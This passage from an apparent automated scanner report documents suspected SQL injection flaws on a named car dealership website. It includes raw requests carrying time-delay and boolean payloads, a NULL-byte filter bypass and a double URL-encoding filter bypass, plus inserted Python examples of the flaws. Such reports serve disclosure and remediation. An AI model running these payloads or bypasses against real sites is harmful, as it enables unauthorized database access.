Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792%00''; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 02:27:09 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 02:27:10 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 02:27:10 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 25654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>2011 Toyota Highland
...[SNIP]...

1.153. http://www.fremonttoyota.com/Toyota/Sequoia/ [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.fremonttoyota.com
Path:   /Toyota/Sequoia/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /Toyota/Sequoia/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:20:41 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:20:42 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:20:42 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 37576

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>2011 Toyota Sequoia
...[SNIP]...
<br /> Inside and out, the 2011 Sequoia never fails to impress with a polished front chrome grille, sporty rear spoiler, and convenient roof racks for transporting oversized cargo. Additionally, all 8 passengers will love the detailed wood-trimmed int
...[SNIP]...

Request 2

GET /Toyota/Sequoia/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:20:57 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:20:58 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:20:58 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 37311

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>2011 Toyota Sequoia
...[SNIP]...

1.154. http://www.fremonttoyota.com/Toyota/Sienna/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fremonttoyota.com
Path:   /Toyota/Sienna/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1. The application took 90730 milliseconds to respond to the request, compared with 17471 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /Toyota'waitfor%20delay'0%3a0%3a20'--/Sienna/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response

HTTP/1.1 404 Not Found
Date: Wed, 08 Dec 2010 03:30:27 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 47986

<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Fremont Toyota - Toyota - Serving Oakland - Serving San Jose - Serving Stockton - Serving Watso
...[SNIP]...

1.155. http://www.fremonttoyota.com/Toyota/Tacoma%20PreRunner/ [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.fremonttoyota.com
Path:   /Toyota/Tacoma%20PreRunner/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /Toyota/Tacoma%20PreRunner/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:05:40 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:05:40 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:05:41 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 28313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>2011 Toyota Tacoma P
...[SNIP]...
</div>The 2011 Toyota Tacoma PreRunner is a exceptional pick-up truck with stylish appeal.<br />
...[SNIP]...

Request 2

GET /Toyota/Tacoma%20PreRunner/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:05:52 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:05:52 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:05:53 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 28262

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>2011 Toyota Tacoma P
...[SNIP]...

1.156. http://www.fremonttoyota.com/Toyota/Tacoma%20PreRunner/ [__utmb cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.fremonttoyota.com
Path:   /Toyota/Tacoma%20PreRunner/

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmb cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /Toyota/Tacoma%20PreRunner/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792%00'; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 02:48:18 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 02:48:19 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 02:48:19 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 28261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>2011 Toyota Tacoma P
...[SNIP]...
</div>The 2011 Toyota Tacoma PreRunner is a exceptional pick-up truck with stylish appeal.<br />
...[SNIP]...

Request 2

GET /Toyota/Tacoma%20PreRunner/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792%00''; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 02:48:33 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 02:48:34 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 02:48:34 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 28237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>2011 Toyota Tacoma P
...[SNIP]...

1.157. http://www.fremonttoyota.com/Toyota/Tundra%20Double%20Cab%204x2/ [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.fremonttoyota.com
Path:   /Toyota/Tundra%20Double%20Cab%204x2/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /Toyota/Tundra%20Double%20Cab%204x2/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Referer: http://www.google.com/search?hl=en&q=%2527

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:30:45 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:30:45 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:30:46 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 31218

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>2011 Toyota Tundra D
...[SNIP]...
IMG SRC='http://images.carprices.com/pricebooks_data/usa/colorized/2011/Toyota/View/Tundra_Double_Cab_4x2/Base/8241_040.jpg' WIDTH=277 STYLE='float:left; padding: 5px;margin: 5px;'>Drivers looking for exceptional strength should turn to this particular Tundra. With its large 5.7-liter engine, this V8 Tundra is ready to demonstrate its fearless performance. This trim additionally offers 18" steel wheels and c
...[SNIP]...

Request 2

GET /Toyota/Tundra%20Double%20Cab%204x2/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Referer: http://www.google.com/search?hl=en&q=%2527%2527

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:30:52 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:30:52 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:30:53 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 31011

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>2011 Toyota Tundra D
...[SNIP]...

1.158. http://www.fremonttoyota.com/Toyota/Venza/ [BIGipServerAPACHE_DEV cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.fremonttoyota.com
Path:   /Toyota/Venza/

Issue detail

The BIGipServerAPACHE_DEV cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the BIGipServerAPACHE_DEV cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the BIGipServerAPACHE_DEV cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /Toyota/Venza/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000%2527;

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:35:48 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:35:49 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:35:49 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 27957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>2011 Toyota Venza at
...[SNIP]...
cebooks_data/usa/colorized/2011/Toyota/View/Venza/Base/2822_1F7.jpg' WIDTH=277 STYLE='float:left; padding: 5px;margin: 5px;'>The 4-door Toyota Venza comes equipped with a stellar 6-cylinder engine and exceptional all-wheel drive. You'll love the dual chrome exhaust tips, rear seat personal reading lamps, and the convenient cargo area tonneau cover. <DIV STYLE='float:right; width:850px;'>
...[SNIP]...

Request 2

GET /Toyota/Venza/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000%2527%2527;

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:35:56 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:35:56 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:35:57 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 27883

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>2011 Toyota Venza at
...[SNIP]...

1.159. http://www.fremonttoyota.com/Toyota/Venza/ [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.fremonttoyota.com
Path:   /Toyota/Venza/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
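The decode-order problem described in the two paragraphs above, as an added example (not code from the scanned site): the web server percent-decodes once, a naive filter then inspects the value, and an unnecessary second decode turns %27 into a literal quote after the filter has already passed it. The filter, the blocklist and the pipeline functions are assumptions chosen to reproduce the reported behaviour; the cookie and Referer values come from the requests shown on this page.

```python
"""
Double URL-decoding bypass of a quote filter (issues 1.158 and 1.159 above).

Added example, not the scanned site's code. The blocklist and the two
pipelines are assumptions that reproduce the symptom the report describes:
a raw ' is blocked, %2527 is not.
"""
from urllib.parse import unquote

# Assumed blocklist of the kind a simple anti-injection filter uses.
BLOCKED = ("'", '"', ";", "--")


def web_server_decode(raw: str) -> str:
    """The single percent-decode the web server (or framework) performs."""
    return unquote(raw)


def naive_filter(value: str) -> bool:
    """True if the value is allowed: looks only for literal blocked chars."""
    return not any(b in value for b in BLOCKED)


def vulnerable_pipeline(raw: str):
    """
    Validate after the server's decode, then decode AGAIN before the value
    reaches the query (the unnecessary second decode named in the
    remediation detail). Returns (allowed, value_that_reaches_query).
    """
    once = web_server_decode(raw)
    if not naive_filter(once):
        return False, None
    twice = unquote(once)  # second decode: %27 -> '
    return True, twice


def hardened_pipeline(raw: str):
    """
    Canonicalise first (the server's decode is the only one), then validate
    the final form. Returns (allowed, value_that_reaches_query).
    """
    canonical = web_server_decode(raw)
    if not naive_filter(canonical):
        return False, None
    return True, canonical


if __name__ == "__main__":
    for raw in ("%27", "%2527", "2936078602.20480.0000%2527",
                "http://www.google.com/search?hl=en&q=%2527"):
        print(raw, "vulnerable:", vulnerable_pipeline(raw),
              "hardened:", hardened_pipeline(raw))
```

The hardened pipeline still relies on a blocklist, which is only defence in depth; the value that finally reaches the database should be bound as a query parameter so that a quote, however it was encoded on the wire, can only ever be data.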

Request 1

GET /Toyota/Venza/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Referer: http://www.google.com/search?hl=en&q=%2527

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:40:08 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:40:08 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:40:09 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 27853

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>2011 Toyota Venza at
...[SNIP]...
</div>Get more with the 2011 Venza from Toyota, a 6-speed electronically-controlled automatic transmission crossover SUV that packs quite the punch. The Venza's performance is enhanced with exceptional ventilated front brakes and rear solid brakes while the electric power steering option eases your control over the steering wheel. <br />
...[SNIP]...

Request 2

GET /Toyota/Venza/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Referer: http://www.google.com/search?hl=en&q=%2527%2527

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:40:11 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:40:11 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 03:40:12 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 27892

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>2011 Toyota Venza at
...[SNIP]...

1.160. http://www.fremonttoyota.com/carresearch/BodystylesGroup/confid_fremonttoyota/make_Toyota/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.fremonttoyota.com
Path:   /carresearch/BodystylesGroup/confid_fremonttoyota/make_Toyota/

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 19672140'%20or%201%3d1--%20 and 19672140'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
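The differential test behind this finding, as an added example that is not the scanned site's code. Note what the two responses below show: the 1=1 request returns a page titled with a different dealer's name (Sterling McCall Hyundai Houston) while the 1=2 request returns an empty dealer name, which is what a tautology matching some other row, and a contradiction matching none, would produce. The dealers table, its columns and the lookup query are assumptions that reproduce that symptom with constructed data; the confirm() routine adds the repeat-and-compare step the paragraph above asks for.

```python
"""
Boolean-based SQL injection probe (issue 1.160 above).

Added example, not the scanned site's code. Table, columns, query shape and
the seed rows are assumptions; the payloads are the report's.
"""
import sqlite3

# Constructed sample data; the first row stands in for "some other dealer".
SEED = [
    ("sterlingmccall", "Sterling McCall Hyundai Houston"),
    ("fremonttoyota", "Fremont Toyota"),
]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE dealers (confid TEXT PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO dealers VALUES (?, ?)", SEED)
    return conn


def dealer_name_vulnerable(conn, confid: str) -> str:
    """String-concatenated lookup: the path segment becomes SQL."""
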